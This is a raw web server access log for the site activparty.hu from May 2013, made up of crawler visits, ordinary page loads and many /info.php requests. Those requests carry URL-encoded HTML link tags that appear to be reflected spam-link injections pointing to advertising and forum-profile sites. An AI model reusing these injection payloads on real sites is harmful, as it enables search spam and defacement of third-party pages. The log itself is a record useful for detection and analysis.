77.88.42.27 - - [04/May/2013:10:39:24 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [04/May/2013:10:39:25 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [04/May/2013:10:39:35 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [04/May/2013:10:39:35 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
217.20.133.112 - - [04/May/2013:12:09:29 +0200] "GET / HTTP/1.1" 200 3021 "" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 1.1.4322; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; AskTbORJ/5.15.1.22229)"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET /images/logo.gif HTTP/1.1" 200 2246 "http://activparty.hu/" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET /images/belepes_off.gif HTTP/1.1" 200 772 "http://activparty.hu/" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET /images/letoltes_off.gif HTTP/1.1" 200 821 "http://activparty.hu/" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET /images/belepes_on.gif HTTP/1.1" 200 771 "http://activparty.hu/" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.113 - - [04/May/2013:12:09:54 +0200] "GET /images/letoltes_on.gif HTTP/1.1" 200 821 "http://activparty.hu/" "Mozilla/5.0 (Unknown; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.6.0 Safari/534.34"
217.20.133.112 - - [04/May/2013:12:09:58 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
217.20.133.112 - - [04/May/2013:12:09:58 +0200] "GET //robots.txt HTTP/1.0" 404 - "-" "-"
217.20.133.112 - - [04/May/2013:12:09:59 +0200] "GET / HTTP/1.1" 200 3021 "" "Mozilla/5.0 (compatible; HDB2-Bot/2.3; +http://hdb.0xff.org/bot.html)"
217.20.133.112 - - [04/May/2013:12:09:59 +0200] "GET /aktivparty.html HTTP/1.1" 200 1528 "" "Mozilla/5.0 (compatible; HDB2-Bot/2.3; +http://hdb.0xff.org/bot.html)"
217.20.133.112 - - [04/May/2013:12:09:59 +0200] "GET / HTTP/1.1" 200 3021 "" "Mozilla/5.0 (compatible; HDB2-Bot/2.3; +http://hdb.0xff.org/bot.html)"
212.227.221.38 - - [04/May/2013:13:16:13 +0200] "GET /info.php?a[]=green+coffee+beans HTTP/1.0" 200 48562 "-" "-"
173.213.97.87 - - [04/May/2013:13:16:16 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.0" 200 51065 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
173.213.97.87 - - [04/May/2013:13:16:18 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.0" 200 51131 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
23.29.125.222 - - [04/May/2013:14:44:18 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51485 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre"
23.29.125.222 - - [04/May/2013:14:44:19 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51689 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)"
77.88.42.27 - - [04/May/2013:19:00:00 +0200] "GET /images/letoltes_off.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
46.105.79.126 - - [04/May/2013:19:48:20 +0200] "GET /info.php HTTP/1.0" 200 50329 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.105.79.126 - - [04/May/2013:19:48:23 +0200] "GET /info.php?a[]=%3Ca+href=http://www.birotravelumrah.com/%3Eumrah+ramadhan%3C/a%3E HTTP/1.0" 200 51095 "http://activparty.hu/" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
46.105.179.165 - - [04/May/2013:19:48:23 +0200] "GET /info.php?a[]=%3Ca+href=http://www.birotravelumrah.com/%3Eumrah+ramadhan%3C/a%3E HTTP/1.1" 200 50747 "http://activparty.hu/" "-"
77.88.42.27 - - [04/May/2013:19:51:58 +0200] "GET /images/logo.gif HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
78.97.222.6 - - [04/May/2013:21:17:25 +0200] "GET /info.php HTTP/1.1" 200 50380 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
94.242.255.138 - - [04/May/2013:22:32:26 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51846 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)"
94.242.255.138 - - [04/May/2013:22:32:43 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51723 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02"
94.242.255.138 - - [04/May/2013:22:32:56 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51891 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)"
94.242.255.138 - - [04/May/2013:22:33:15 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51756 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
66.249.78.49 - - [04/May/2013:22:55:28 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:22:55:29 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://www.birotravelumrah.com/%3Eumrah+ramadhan%3C/a%3E HTTP/1.1" 200 50581 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:26:22 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://midlake.net/forum/profile.php?mode=viewprofile&u=207689%3Emidlake.Net%3C/a%3E HTTP/1.1" 200 50932 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:27:45 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://lochcarrongarage.com/index.php?option=com_blog&view=comments&pid=37247&Itemid=0%3Elochcarrongarage.com%3C/a%3E HTTP/1.1" 200 51468 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:30:51 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://www.m2bob-forum.eu//index.php//index.php/index.php?page=User&userID=66366%3Ewww.m2bob-forum.eu%3C/a%3E HTTP/1.1" 200 51132 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:31:19 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://courses.migrantclinician.org/user/view.php?id=84863&course=1%3Ehttp://courses.migrantclinician.org/user/view.php?id=84863&course=1%3C/a%3E HTTP/1.1" 200 51302 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:32:30 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://www.2circolodidatticocaltagirone.it/modules.php?name=Your_Account&op=userinfo&username=Larry00N%3E2Circolodidatticocaltagirone.it%3C/a%3E HTTP/1.1" 200 51548 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.113.193.50 - - [04/May/2013:23:32:49 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:32:50 +0200] "GET /info.php?a[]=%3Ca+href=http://midlake.net/forum/profile.php?mode=viewprofile&u=207689%3Emidlake.Net%3C/a%3E HTTP/1.1" 200 50671 "-" "BlogPulseLive (support@blogpulse.com)"
66.249.78.49 - - [04/May/2013:23:33:15 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://www.periquitos.com.br/forum/profile.php?mode=viewprofile&u=163483%3EFind+Out+More%3C/a%3E HTTP/1.1" 200 51056 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.113.193.50 - - [04/May/2013:23:34:20 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:34:20 +0200] "GET /info.php?a[]=%3Ca+href=http://lochcarrongarage.com/index.php?option=com_blog&view=comments&pid=37247&Itemid=0%3Elochcarrongarage.com%3C/a%3E HTTP/1.1" 200 51207 "-" "BlogPulseLive (support@blogpulse.com)"
66.249.78.49 - - [04/May/2013:23:34:26 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://moodle.trainingprospects.com.au/user/view.php?id=108594&course=1%3Emoodle.trainingprospects.com.au%3C/a%3E HTTP/1.1" 200 51164 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [04/May/2013:23:35:16 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://www.bekkaboo.com/phpBB2/profile.php?mode=viewprofile&u=76430%3E%5B7%5D%3C/a%3E HTTP/1.1" 200 50932 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
206.113.193.50 - - [04/May/2013:23:37:33 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:37:34 +0200] "GET /info.php?a[]=%3Ca+href=http://www.m2bob-forum.eu//index.php//index.php/index.php?page=User&userID=66366%3Ewww.m2bob-forum.eu%3C/a%3E HTTP/1.1" 200 50871 "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:38:00 +0200] "GET /info.php?a[]=%3Ca+href=http://courses.migrantclinician.org/user/view.php?id=84863&course=1%3Ehttp://courses.migrantclinician.org/user/view.php?id=84863&course=1%3C/a%3E HTTP/1.1" 200 51041 "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:39:08 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:39:08 +0200] "GET /info.php?a[]=%3Ca+href=http://www.2circolodidatticocaltagirone.it/modules.php?name=Your_Account&op=userinfo&username=Larry00N%3E2Circolodidatticocaltagirone.it%3C/a%3E HTTP/1.1" 200 51287 "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:39:55 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:39:55 +0200] "GET /info.php?a[]=%3Ca+href=http://www.periquitos.com.br/forum/profile.php?mode=viewprofile&u=163483%3EFind+Out+More%3C/a%3E HTTP/1.1" 200 50795 "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:41:46 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [04/May/2013:23:41:46 +0200] "GET /info.php?a[]=%3Ca+href=http://www.bekkaboo.com/phpBB2/profile.php?mode=viewprofile&u=76430%3E[7]%3C/a%3E HTTP/1.1" 200 50647 "-" "BlogPulseLive (support@blogpulse.com)"
23.22.131.24 - - [04/May/2013:23:43:03 +0200] "GET /info.php?a[]=%3Ca+href=http://www.periquitos.com.br/forum/profile.php?mode=viewprofile&u=163483%3EFind+Out+More%3C/a%3E HTTP/1.1" 200 50489 "-" "viralvideochart.unrulymedia.com"
66.249.76.82 - - [05/May/2013:02:28:04 +0200] "GET / HTTP/1.1" 200 3021 "-" "DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
199.30.20.60 - - [05/May/2013:05:23:01 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
199.30.20.60 - - [05/May/2013:05:23:01 +0200] "GET /images/belepes_off.gif HTTP/1.1" 200 772 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
142.91.79.156 - - [05/May/2013:05:34:14 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51512 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
142.91.79.156 - - [05/May/2013:05:34:19 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51689 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)"
218.213.137.5 - - [05/May/2013:08:48:10 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "DoCoMo/2.0 P900i(c100;TB;W24H11) (compatible; ichiro/mobile goo;+http://search.goo.ne.jp/option/use/sub4/sub4-1/)"
62.205.136.204 - - [05/May/2013:10:07:44 +0200] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
62.205.136.204 - - [05/May/2013:10:07:45 +0200] "GET / HTTP/1.0" 200 3021 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http://www.majestic12.co.uk/bot.php?+)"
78.8.195.247 - - [05/May/2013:10:47:47 +0200] "GET /info.php?a[]=%3Ca+href=http://abiturient.pro/wiki/%D0%A3%D1%87%D0%B0%D1%81%D1%82%D0%BD%D0%B8%D0%BA:RobbieCol%3Eerotyka%3C/a%3E HTTP/1.1" 200 51443 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"
78.8.195.247 - - [05/May/2013:10:47:50 +0200] "GET /info.php?a[]=%3Ca+href=http://abiturient.pro/wiki/%D0%A3%D1%87%D0%B0%D1%81%D1%82%D0%BD%D0%B8%D0%BA:RobbieCol%3Eerotyka%3C/a%3E HTTP/1.1" 200 51709 "http://6901.jawamdam.com.pl" "Mozilla/4.0 w$p1erajmy hosp1cja (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60"
78.8.195.247 - - [05/May/2013:10:52:50 +0200] "GET /info.php?a[]=%3Ca+href=http://abiturient.pro/wiki/%D0%A3%D1%87%D0%B0%D1%81%D1%82%D0%BD%D0%B8%D0%BA:RobbieCol%3Eerotyka%3C/a%3E HTTP/1.1" 200 51467 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
66.249.78.49 - - [05/May/2013:11:43:57 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [05/May/2013:11:43:57 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://mail.andreagalup.com.ar/?a%5B%5D=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51194 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.22.131.24 - - [05/May/2013:11:50:50 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 50608 "-" "viralvideochart.unrulymedia.com"
66.249.76.82 - - [05/May/2013:11:52:02 +0200] "GET /info.php?a%5B%5D=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.1" 200 50659 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
173.213.96.29 - - [05/May/2013:12:30:19 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.0" 200 50972 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre"
173.213.96.29 - - [05/May/2013:12:30:21 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.0" 200 51050 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
94.242.255.138 - - [05/May/2013:12:30:22 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.0" 200 51304 "https://hermes-net.de/scuttle/bookmarks.php/dwaynebusby?action=add" "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
206.113.193.50 - - [05/May/2013:12:47:15 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "BlogPulseLive (support@blogpulse.com)"
206.113.193.50 - - [05/May/2013:12:47:15 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 50914 "-" "BlogPulseLive (support@blogpulse.com)"
123.125.71.15 - - [05/May/2013:13:57:49 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
123.125.71.51 - - [05/May/2013:13:58:04 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
123.125.71.100 - - [05/May/2013:13:58:17 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
123.125.71.104 - - [05/May/2013:13:58:48 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2"
123.125.71.29 - - [05/May/2013:14:00:15 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
94.44.254.249 - - [05/May/2013:18:05:03 +0200] "GET / HTTP/1.1" 200 3021 "http://www.rendezvenyszervezes.ws/rendezvenyszervezes_budapest/II_kerulet/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:04 +0200] "GET /images/logo.gif HTTP/1.1" 200 2246 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:04 +0200] "GET /images/belepes_off.gif HTTP/1.1" 200 772 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:04 +0200] "GET /images/letoltes_off.gif HTTP/1.1" 200 821 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:05 +0200] "GET /images/belepes_on.gif HTTP/1.1" 200 771 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:05 +0200] "GET /images/letoltes_on.gif HTTP/1.1" 200 821 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:06 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:27 +0200] "GET /aktivparty.html HTTP/1.1" 200 1528 "http://www.activparty.hu/" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:05:27 +0200] "GET /js/AC_RunActiveContent.js HTTP/1.1" 200 8321 "http://www.activparty.hu/aktivparty.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
94.44.254.249 - - [05/May/2013:18:06:21 +0200] "GET /activ_party.swf HTTP/1.1" 200 1771834 "http://www.activparty.hu/aktivparty.html" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
203.171.233.91 - - [05/May/2013:19:38:16 +0200] "GET / HTTP/1.0" 200 3021 "-" "-"
203.171.233.91 - - [05/May/2013:19:38:17 +0200] "GET / HTTP/1.0" 200 3021 "-" "-"
50.7.50.2 - - [05/May/2013:20:08:46 +0200] "GET /info.php?a[]=advice HTTP/1.0" 200 48431 "-" "-"
176.61.142.158 - - [05/May/2013:20:08:48 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51472 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
176.61.142.158 - - [05/May/2013:20:08:50 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.0" 200 51689 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)"
94.242.255.138 - - [05/May/2013:22:36:44 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51736 "http://activparty.hu/" "Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.15"
94.242.255.138 - - [05/May/2013:22:37:15 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51780 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
94.242.255.138 - - [05/May/2013:22:38:36 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51735 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1"
94.242.255.138 - - [05/May/2013:22:40:37 +0200] "GET /info.php?a[]=%3Ca+href=http://gogreencoffee.blogspot.com/%3Egreen+coffee+beans%3C/a%3E HTTP/1.1" 200 51315 "http://activparty.hu/" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1"
94.242.255.138 - - [05/May/2013:22:42:27 +0200] "GET /info.php?a[]=%3Ca+href=http://mail.andreagalup.com.ar/?a[]=%3Ca+href=http://thirdpartyinsurances.com/%3Elook+what+I+found%3C/a%3E%3Eadvice%3C/a%3E HTTP/1.1" 200 51915 "http://activparty.hu/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.115.111.72 - - [05/May/2013:23:17:54 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
208.115.111.72 - - [05/May/2013:23:38:02 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)"
66.249.78.49 - - [06/May/2013:02:30:40 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.78.49 - - [06/May/2013:02:30:41 +0200] "GET / HTTP/1.1" 200 3021 "-" "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6531.22.7 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
77.88.42.27 - - [06/May/2013:05:54:01 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
77.88.42.27 - - [06/May/2013:05:54:03 +0200] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
66.249.76.82 - - [06/May/2013:05:59:41 +0200] "GET / HTTP/1.1" 200 3021 "-" "SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)"
